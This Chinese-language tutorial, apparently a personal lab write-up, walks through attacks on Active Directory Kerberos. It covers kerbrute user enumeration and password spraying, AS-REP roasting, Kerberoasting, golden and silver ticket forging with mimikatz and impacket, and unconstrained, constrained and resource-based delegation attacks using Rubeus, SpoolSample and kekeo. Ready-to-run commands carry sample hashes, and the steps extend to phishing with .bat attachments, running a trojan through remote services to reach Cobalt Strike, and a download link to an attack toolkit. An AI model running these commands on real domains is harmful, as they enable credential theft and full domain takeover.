域内用户枚举和喷洒

域内用户枚举原理和流量

原理:在AS-REQ阶段客户端向AS发送用户名,cname字段存放用户名,AS对用户名进行验证,用户存在和不存在返回的数据包不一样,4种状态的错误代码分别为:

  1. KRB5DC_ERR_PREAUTH_REQUIRED
    需要额外的预认证(用户存在)但是没有提供密码 ,错误代码0x19

  2. KRB5KDC_ERR_PREAUTH_FAILED(用户存在密码错误)0x18

  3. KRB5DC_ERR_CLIENT_REVOKED 客户端凭证已被吊销(存在但禁用)0x12

  4. KRB5DC_ERR_C_PRINCIPAL_UNKNOWN
    在Kerberos数据库中找不到客户端(不存在)

当用户存在但是密码错误时

一般的工具判断都是以流量中的结果代码判断的,比如这个24是0x18

其他的情况流量分析是一样的,就不累赘了。

域内密码喷洒

原理跟前面枚举用户差不多,都是判断流量中的返回代码

这里我们使用lisi用户正确的密码申请票据,这里判断的是msg-type是否等于11

1、域环境:可以使用kerberos和NTLM协议进行喷洒域内用户

2、工作组:可以使用NTLM协议进行喷洒(不能叫喷洒可以叫Hash碰撞)

Kerbrute工具的使用https://github.com/ropnop/kerbrute/releases

域内用户枚举

kerbrute.exe userenum --dc 域控IP -d 域名 用户名字典

域内密码喷洒

  1. 当管理员配置了一个用户最多尝试多少次密码就被锁定时,就用一个密码去尝试用户字典里面的所有用户

kerbrute.exe passwordspray --dc 域控IP -d 域名 用户字典 密码

我这密码都是一样的-_-

2.针对单一用户进行无限次破解

kerbrute.exe bruteuser --dc 域控IP -d 域名 密码字典 用户名

Roasting攻击

原理:AS-REP
Roasting攻击是一种对用户账号进行离线爆破的攻击方式,他是因为管理员的错误配置导致的,不属于漏洞。该攻击是AS-REP数据包导致的,因为管理员在域控上勾选了【不要求Kerberos】预身份验证。

AS-REP是KDC收到AS-REQ之后解密PA-DATA
pA-ENC-TIMESTAMP,如果成功就返回AS-REP

那么勾选了这个选项之后,只向KDC发送用户名也能返回AS-REP

然后我们就能解密返回的NTLM哈希值从而知道用户密码。

所以我们首先就得知道域内有哪些用户勾选了这个选项

  1. 在域控上执行ps命令,可以查找到。该命令可方便管理员查看

Get-ADUser -Filter 'useraccountcontrol -band 4194304' -Properties
useraccountcontrol | Format-Table name

2.在域内主机上执行,用ps脚本

先导入 Import-Module .\PowerView.ps1

Get-DomainUser -PreauthNotRequired -Properties distinguishedname
-Verbose

在工作组中需要知道一个域用户的账号密码才能够查询。

暴力破解用户Hash值

当我们拿到一个这样用户的AS-REP之后,可以拿到加密的hash值,有方法可以暴力破解,我觉得没必要就直接跳过了。

Kerberoasting攻击

原理:1、ST票据的加密方式没有强制采用aes256,可以使用MD5的加密

2、在TGS认证TGT的时候,不管提供的用户是否具有访问目标服务的权限都会返回目标服务的ST

前提是需要一个域内用户的账号密码,不管用户有没有访问服务的权限,只要TGT正确,就都会返回ST服务票据,就可以请求域内任何一个服务的ST票据.
也就是去破解注册在用户下面的SPN服务。

服务主体名SPN介绍

服务主体名称SPN(Server Principal
Name),是服务实例(可以理解为一个服务,比如HTTP、MSSQL)的唯一标识符。Kerberos身份验证使用SPN将服务实例与服务帐户相关联。在域中如果有多个服务,每个服务必须有自己的SPN和用户,一个用户可以有多个SPN,但是SPN只能对应一个用户,SPN必须注册的用户下。

SPN的格式:<ServiceClass>/<host>:<port>/<servicename>

前两个是必要的,后两个可要可不要。例如SQL/SQL.abc.com意思是在SQL.abc.com这台主机上面有SQL服务,默认是注册在机器账户上面的。SPN可以注册在域中的用户,默认只有机器用户或者域管理员用户才有权限去注册SPN

查询SPNsetspn -Q */*

SPN的注册注意事项:

在使用kerberos访问对方电脑的服务之前,KDC上必须有服务对应的SPN,并且注册到了用户上。

注册SPN有两种方式:

1、系统自动完成注册比如我们安装EX邮箱,SQL等

2、手动注册,可以根据SPN的格式手动注册

通过setspn命令去注册SPN

在域用户ZhangSan的账户下注册一个HTTP的服务,注册在ZhangSan-PC这台主机上setspn
-U -S HTTP/ZhangSan-PC.ABC.COM:80 zhangsan

可以看出是以用户为主体,有的是以机器账户为主体,参数-D删除

黄金票据

原理:伪造TGT。不需要和KDC进行校验,金票可以在本地直接生成,生成的金票在非域机器和域内机器都可以使用。

利用条件:

  1. 必须知道KDC秘钥分发中心账户KRBTGT的hash值(重要)。Krbtgt用户只有在域控上(要知道该用户的hash,必须先要控制域控或者通过远程查询)

  1. 域名

  2. 域的SID值。在域中执行whoami /all(域的SID值就是去掉500前面的)

  1. 需要伪造的用户(一般都是域管理员)administrator

Krbtgt-Hash值获取方式

1、控制了域控然后查询

2、通过dcsync查询

lsadump::dcsync /domain:abc.com /user:krbtgt

Golden Ticket的各种制作方式和使用

①使用impaket工具包的ticketer生成

ticketer.exe -domain-sid sid值 -nthash krb_hash值 -domain 域名
要伪造的用户名

示例ticketer.exe -domain-sid S-1-5-21-3017290923-2273747523-1411849474
-nthash 761ece70c2d4acf1579aec71ec34cdbe -domain abc.com administrator

②使用mimikatz生成

kerberos::golden /user:administrator /domain:域名 /sid:SID值
/krbtgt:NTLM-HASH值 /ptt

示例kerberos::golden /user:administrator /domain:abc.com
/sid:S-1-5-21-3017290923-2273747523-1411849474
/krbtgt:761ece70c2d4acf1579aec71ec34cdbe

//后面的PTT如果携带 就会自动注入到内存,如果不带就在本地生成

注入内存进行传递

Kerberos::ptc (传递后缀名为Ccache)

Kerberos::ptt (传递后缀名为Kirbi)

反正这两种后缀都可以相互转化

然后就可以横向啥的了

白银票据

原理:白银票据就伪造ST票据,使用的是机器用户的Hash值。
kerberoasting是破解ST票据中的服务用户hash值。

利用的条件:

1.域名 2.域sid 3.目标服务器名(域名) 4.可利用的服务 5.
目标机器用户的NTLM-HASH 6.需要伪造的用户名

使用白银票据伪造常用服务

实验过程通过在内存中注入高权限的TGT票据,每次执行命令再查看内存中(klist)生成了什么服务,可得出如下结论:

1、CIFS服务。在windows主机之间进行网络文件共享是通过使用微软公司自己的CIFS服务实现的
,伪造cifs服务可以执行常用的dir、copy等命令。

2、伪造LDAP服务权限使用白银票据伪造常用服务可以实现ldap查询,或者执行dcsync(优先选择这个服务)

3、host服务。可以实现计划任务和服务等

SILVER TICKET各种制作方式和使用

kerberos::golden /domain:域名 /sid:sid值 /target:完整的域控名
/service:服务名 /rc4:服务账号NTMLHASH /user:用户名 /ptt

示例kerberos::golden /domain:abc.com
/sid:S-1-5-21-3017290923-2273747523-1411849474 /target:dc.abc.com
/service:cifs /rc4:afffeba176210fad4628f0524bfe1942 /user:LiSi

其中的用户名可以随便写

委派的概念和分类与协议

非约束性委派

委派发生在Kerberos协议之后,web系统代表张三去访问,也需要经过Kerberos认证,此时web系统中含有张三用户的TGT票据(如果张三是服务账号就不会在委派那里留下缓存的TGT)。

非约束性即没有任何限制,web系统就可以以张三的身份去访问域内任何一台机器了,假设张三是域管理员,控制了web系统即可控制整个域。

约束性委派

微软于2007年为Kerberos协议进行扩展引入S4U(service for
user)协议,该协议分为两个子协议,这两个扩展都允许服务代表用户从KDC请求票证。

1、S4u2self(Service for User to Self)

2、S4U2proxy(Service for User to Proxy)

如果仅仅只是不安全,约束一下就好了,被委派的机器只能访问设定好机器的服务,大可不必引入新协议。引入新协议的原因是”不安全+应用场景受限”。

受限场景:当这个用户不在域内,他在出差,不能使用kerberos去认证,只能使用其他协议认证web系统,那同样WEB系统也需要访问文件服务的资源,这个时候如何认证呢?

那就要用到这两个协议了

基于资源的约束性委派

可以将基于资源的约束性委派理解为传统的约束性委派的反向过程。以WEB服务器和文件服务器两个服务为例,传统的约束性委派需要在WEB服务器上设置委派属性,以指定对文件服务器上的哪一个服务进行委派,而在基于资源的约束性委派中,需要在文件服务器上设置资源委派,以允许web服务器对文件服务器上的服务进行委派。

也就是说原来需要在域管上设置委派人的约束,现在是在被访问的资源上设置谁可以委派来访问自己,不需要在域管上设置。

上述过程用户A访问WEB系统B,B代表A去向KDC申请访问B的TGT和ST1(使用S4u2self),用户A拿到了ST1就可以访问B了,如果在B上配置了约束性委派(A到C的约束委派),则B能够使用S4U2Proxy协议将用户发给自己的可转发的ST1票据以用户的身份发给KDC,KDC返回B一个访问C的票据ST2,这样B就可以拿着ST2以用户的身份访问C。

非约束性委派攻击

非约束性委派设置

非约束性委派设置在域控上,设置的对象分为两种:

  1. 机器账号,也就是给computer设置

  1. 注册了SPN的域用户

配置了非约束性委派的机器,一旦访问该机器,TGT就会被缓存在lsass进程的内存中,通过
klist是不能查看的,必须查看内存。

注意如下的问题 :1、域控是默认配置了非约束性委派的(跨域攻击可以用到)
2、配置的非约束性委派最好是机器用户容易触发

查询配置了的非约束性委派

  1. AdFind.exe工具

查询机器用户配置了非约束性委派

AdFind.exe -b "DC=abc,DC=com" -f
"(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))"
-dn

+———————————————————————–+
| 解释: |
| |
| |
| |
+=======================================================================+
+———————————————————————–+

查询域用户(配置了SPN)配置了非约束性委派

AdFind.exe -b "DC=abc,DC=com" -f
"(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))"
-d

  1. PowerView.ps1脚本 (只能查询到委派的机器账户)

Import-Module .\PowerView.ps1

Get-NetComputer –unconstrained | select dnshostname, samaccountname

CS下的命令powershell-import PowerView.ps1

钓鱼方式进行委派攻击上线

前提是控制了具有非约束委派的机器,此时想要拿下其他账号的票据,就可以进行钓鱼。

比如说发邮件,附件带有.bat脚本,内容就是执行命令访问这台机器。

但是执行”dir
\\woli-30.abc.com\c$“肯定不行的,因为这是走的NTLM认证,是挑战响应协议,要想拿到票据,必须要走kerboros认证。

这里以ZhangSan(管理员)账户为例,去与目标建立一个IPC连接

通过mimikatz导出,需要privilege::debug权限

sekurlsa::tickets /export

ZhangSan这个用户的票据就拿到了,再进行ptt攻击->上线

利用打印机漏洞进行委派攻击

一般情况下,要让域管来主动访问被设置了非约束性委派的机器比较难,可以结合漏洞进行。

一般域管不会主动访问我们,我们可以利用Windows打印系统远程协议(MS-RPRN)中的一种旧的但是默认启用的方法,在该方法中,域用户可以使用MS-RPRNRpcRemoteFindFirstPrinterChangeNotification(Ex)方法强制任何运行了Spooler服务的计算机以通过Kerberos或NTLM对攻击者选择的目标进行身份验证。非约束性委派主机结合Spooler打印机服务漏洞,让域控机器DC强制访问已控的具有本地管理员权限的非约束性委派机器,从而拿到域控的机器用户HASH,从而进行控制整个域。

进行实验之前一定要把所有的防火墙关闭!

首先利用Rubeus在被控制主机上以本地管理员权限执行以下命令,每隔一秒监听来自域控机器DC(主机名)的登录信息。

Rubeus.exe monitor /interval:1 /filteruser:DC$

再使用SpoolSample强制域控打印机回连

SpoolSample.exe DC woli

我用WinSer2008复现不了,ser2012可以,目前没有加入这台主机,暂且先放这里吧

复现成功是这样的:

然后将这些全部复制下来清除空格搞成一行->作为票据 导入到内存

Rubeus.exe ptt /ticket:票据

约束性委派攻击

约束性委派设置方式

还是在域控上

再继续选择委派的服务

当然也可以直接委派具有SPN的用户

约束性委派的攻击分析

实验过程

攻击前是拒绝访问的

利用Rubeus.exe工具进行攻击

Rubeus.exe s4u /user:woli-30$ /rc4: d9a1c7c00b9d1035ffd5914dbb5aa2c9
/domain:abc.com /msdsspn:CIFS/ZhangSan-PC.abc.com
/impersonateuser:administrator /ptt

命令解释:

/user: 具有约束委派的用户,这里提供的是woli-30这个机器账户

/rc4: woli-30$这个机器用户的NTLM哈希值,用来表名身份,可抓取到

/msdsspn:是指可以委派的SPN

impersonateuser:是指代表谁去访问,一般是域管才有意义

攻击成功之后能看到缓存的administrator的票据

然后就是常规操作了 上线!

流量层面分析

按上述命令回车并抓包分析流量

筛选kerberos协议的流量,发现有6个数据包

所以过程就是这样:

1、某用户通过其他认证访问woli-30电脑(任意用户,我们伪造的administrator)

2、Woli-30电脑使用自己的服务账号申请一张TGT,上图步骤①,req、resp

3、Woli-30电脑拿着自己的TGT,以administrator的身份申请一张administrator访问服务账号本身的ST1(S4U2self)

4、Woli-30电脑拿着ST1以用户身份申请一张administrator访问ZhangShan-PC电脑的CIFS服务的ST2(S4U2proxy)

这个过程中存在的问题:

1、B可以代表A申请访问B的票据,那么可不可以代表域管申请域管访问B的票据呢?在这个过程中,不需要域管参与,服务B自身就可以完成。

只需要知道服务账户的密码或者HASH值就可以申请任意用户访问自身服务的票据(ST1)

2、B可以代表A申请访问C的票据,那么可不可以代表域管申请域管访问C的票据呢?在这个过程中,不需要域管参与,服务B自身就可以完成。

使用ST1票据就可以申请任意用户访问委派的目标服务的票据(ST2)

查询配置约束性委派的账户

还是前面的AdFind和PowerView脚本

查询域内有约束性委派的服务账户

AdFind.exe -b "DC=abc,DC=com" -f
"(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn
distinguishedName msds-allowedtodelegateto

查询域内配置了约束性委派的机器账户

AdFind.exe -b "DC=abc,DC=com" -f
"(&(sAMAccountType=805306369)(msDS-AllowedToDelegateTo=*))"
sAMAccountName distinguishedName msDS-AllowedToDelegateTo

Powerview

查询约束委派服务账户

Get-DomainUser –TrustedToAuth -domain abc.com -Properties
distinguishedname,msds-allowedtodelegateto|fl

查询约束委派机器账户

Get-DomainComputer -TrustedToAuth -domain abc.com -Properties
distinguishedname,msds-allowedtodelegateto|ft -Wrap -AutoSize

约束性委派攻击上线CS

如果是机器用户的话,我们必须知道以下的情况
1、机器用户的HASH值(机器用户明文密码不可能知道的)
2、机器用户设置的委派的机器和服务

直接复用上面的环境,现在我们已经上线控制了具有约束性委派的机器用户woli-30,并且抓取了NTLM哈希为d9a1c7c00b9d1035ffd5914dbb5aa2c9,现要上线委派的目标ZhangSan-PC。

利用机器用户的Hash值申请TGT票据,每一中工具可能利用的方式不太一样
这里提供两种方式(分别对应两个工具):

1、Rubeus.exe asktgt /user:机器用户名 /rc4:NTLM-HASH /domain:域名
/dc:域控域名 /nowrap

2、kekeo.exe "tgt::ask /user:机器用户名 /domain:域名 /NTLM:NTLM-HASH"
"exit"

我们使用第二个工具kekeo

kekeo.exe "tgt::ask /user:woli-30$ /domain:abc.com
/NTLM:d9a1c7c00b9d1035ffd5914dbb5aa2c9" "exit"

再利用申请到的TGT去申请ST1和ST2

kekeo.exe "tgs::s4u /tgt:TGT票据 /user:Administrator@域名
/service:委派的SPN" "exit"

然后将ST2票据导入内存,访问目标机器

mimikatz.exe "kerberos::ptt 票据名" "exit"

最后执行计划任务或者服务上线,前面写了很多,这里用服务吧

先创建服务名为test

sc \\IP地址 create test binpath=空格"cmd.exe /c 命令"

然后运行服务

sc \\ZhangSan.abc.com start test

我的环境问题上线不了,手动点击都不行,但是服务创建得没有问题

如果是域用户的话可以用hash或者密码,推荐用hash,因为密码可能有特殊字符影响。获取密码还可以进行喷洒、爆破、roasting等。

基于资源的约束性委派攻击

设置方式

微软在Windows Server 2012中新引入基于资源的约束性委派(Resource Based
Constrained
Delegation)简称RBCD,基于资源的约束性委派不需要通过域管理员进行修改,而是将设置属性的权限给了服务资源本身。可以将基于资源的约束性委派理解为传统的约束性委派的反向过程。

不能在域控上直接设置 如下图:

使用域管登录RBCD-PC电脑,执行如下的命令进行修改msDS-AllowedToActOnBehalfOfOtherIdentity

导入Powerview.ps1脚本

//设置变量值 SID是给谁要委派给我的那台电脑

$SD = New-Object Security.AccessControl.RawSecurityDescriptor
-ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SID值)";

//转换为16进制

$SDBytes = New-Object byte[]($SD.BinaryLength);

$SD.GetBinaryForm($SDBytes,0);

//设置RBCD

Get-DomainComputer ZhangSan-PC.abc.com |set-DomainObject -Set
@{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} –Verbose

上述的设置就是SID值得那台电脑委派到了ZhagnSan-PC

//清除RBCD

Set-DomainObject ZhangSan-PC.abc.com -Clear
'msds-allowedtoactonbehalfofotheridentity' -Verbose

此时去域控上查看ZhangSan-PC这台电脑就已经被我设置了RBCD,这一个属性有一串值了

能配置RBCD的用户

并不是所有的用户都可以这个RBCD,那么需要什么条件才可以设置呢?(每一个条件对应一个攻击)

当机器加入域的时候使用的账户

当主机加入域的时候,会输入一个域账号密码,一个普通域用户就可以,默认域中每一个普通帐号都有将10台电脑加入域的权限。

我这里使用woli这个普通域用户将RBCD-PC加入到域。如果之前用别的域用户加入的域要先将域控上的RBCD-PC删除才可以重新用别的用户加入。在测试中,退出重新用新用户光删除进好像不太行,连机器名一起改掉都不行,最好还是用一台新电脑测试。

登录woli,使用这个进入域的账户就可以

主机的机器用户(system)

提权到system

incognito.exe list_tokens -u

incognito.exe execute -c "NT AUTHORITY\SYSTEM" powershell.exe

这里我们用CS

域管理员(administrator),普通域管还不行

AccountOperator组中的成员

查询配置RBCD的机器

查询配置了RBCD的机器账户

AdFind.exe -b "DC=abc,DC=com" -f
"(&(samAccountType=805306369)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
-dn

查询配置了RBCD的域账户

AdFind.exe -b "DC=abc,DC=com" -f
"(&(samAccountType=805306368)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))"
-dn

查询机器是由那个用户加入到域中的(这里查询的是SID值)

AdFind.exe -b "DC=abc,DC=com" -f "objectClass=computer"
mS-DS-CreatorSID

通过SID查询用户

AdFind.exe -sc adsid:S-1-5-21-3017290923-2273747523-1411849474-1110 -dn

利用机器账号的RBCD上线CS

当我们控制了域内一台主机,假如这里拿下的是域内主机ZhangSan-PC,可以通过查询RBCD的配置然后进行攻击。

第一步:查询配置了RBCD的机器,上一节已经详细说过

第二步:查询配置ZangSan-PC或RBCD 查询到可以委派的机器SID值

$woli=Get-DomainComputer RBCD -Properties
'msds-allowedtoactonbehalfofotheridentity' | Select-Object
-ExpandProperty msds-allowedtoactonbehalfofotheridentity

(New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList
$woli,0).DiscretionaryAcl

通过SID查询具体的账号,查询出来主机RBCD设置的委派是这个SID值。

这里注意:如果是机器账号必须要控制该机器,如果是域账号可以通过密码喷洒

AdFind.exe -sc adsid:S-1-5-21-3017290923-2273747523-1411849474-1104 -dn

然后查询出来这个SID值就是ZhangSan

也就是说我们控制的这台主机(ZhangSan-PC)被RBCD(-PC)主机设置了RBCD

现在我们就得去攻击这台主机RBCD,就是用到约束性委派攻击方法了。

本来打算另一个工具的,结果非要装那个.NET Framework,

Kekeo好像不能进行RBCD攻击

Rubeus.exe asktgt /user:ZhangSan-PC$
/rc4:4a0d25286f921e1f748573ea02308ef3 /domain:abc.com /dc:dc.abc.com
/nowrap

kekeo.exe "tgt::ask /user:ZhangSan-PC$ /domain:abc.com
/NTLM:4a0d25286f921e1f748573ea02308ef3" "exit"

kekeo.exe "tgs::s4u /tgt:TGT名称 /user:Administrator@abc.com
/service:伪造的服务" "exit"

然后mimikatz传递票据

创建服务 服务为运行已经copy过去的1.exe木马

shell sc \\rbcd.abc.com start test

运行服务,上线成功,还是system权限

利用域账号的RBCD上线CS

实验思路:

查询mS-DS-CreatorSID值

一旦电脑使用普通的域用户加入了域,在机器的属性中mS-DS-CreatorSID就是加入域用户的SID值
AdFind.exe -b "DC=abc,DC=com" -f "objectClass=computer"
mS-DS-CreatorSID

可以看到这里有三台主机都是由同一个普通域用户加入到域的

反查SID值对应的用户名,接下来我们就查查这个SID值是哪个用户

AdFind.exe -sc adsid:S-1-5-21-3017290923-2273747523-1411849474-1110 -dn

那也就是说我们只要拿到了woli用户的权限,就可以给这三台主机设置RBCD进而拿下上线。

当前我们已经拿下了RBCD主机,但是权限是用户lisi的。接下来就需要进行woli的密码枚举(喷洒、kerberoasting等等得到该用户的密码为123.com).

使用lsrunasw进行权限切换.

先使用第一个工具将明文密码进行加密如下

然后输入命令就可以以woli用户重新上线这台RBCD主机了

lsrunase.exe /user:woli /password:vA0jwfUB8w== /domain:abc.com
/command:c:\1.exe /runpath:c:\

这里最好是把木马放在C盘下去执行,因为woli用户是没有权限去访问lisi用户的文件的,当然也可以用powershell无文件落地方式上线woli

这里再给这台主机添加一个机器账号,因为RBCD攻击中申请TGT时得用到本机的HASH,就不用去抓取,直接用我们添加的密码已知。

先在CS中导入一下Powermad.ps1脚本

powershell New-MachineAccount -MachineAccount woli1 -Password
$(ConvertTo-SecureString "123456" -AsPlainText -Force)

密码是123456,申请TGT的时候在线找个工具加密成NTLM使用

再导入一下powerview脚本获取添加的机器账户的SID值

powershell Get-NetComputer woli1 -Properties objectsid

然后就是去给另外两台主机设置RBCD用委派攻击那一套去打了

注意要回到lisi用户的会话界面方便操作,工具都在这边

内网渗透总体流程

总体流程

域内攻击工具链接:

https://pan.baidu.com/s/1cuTn6p8sOVZntVXSSFsVzQ?pwd=woli

提取码:woli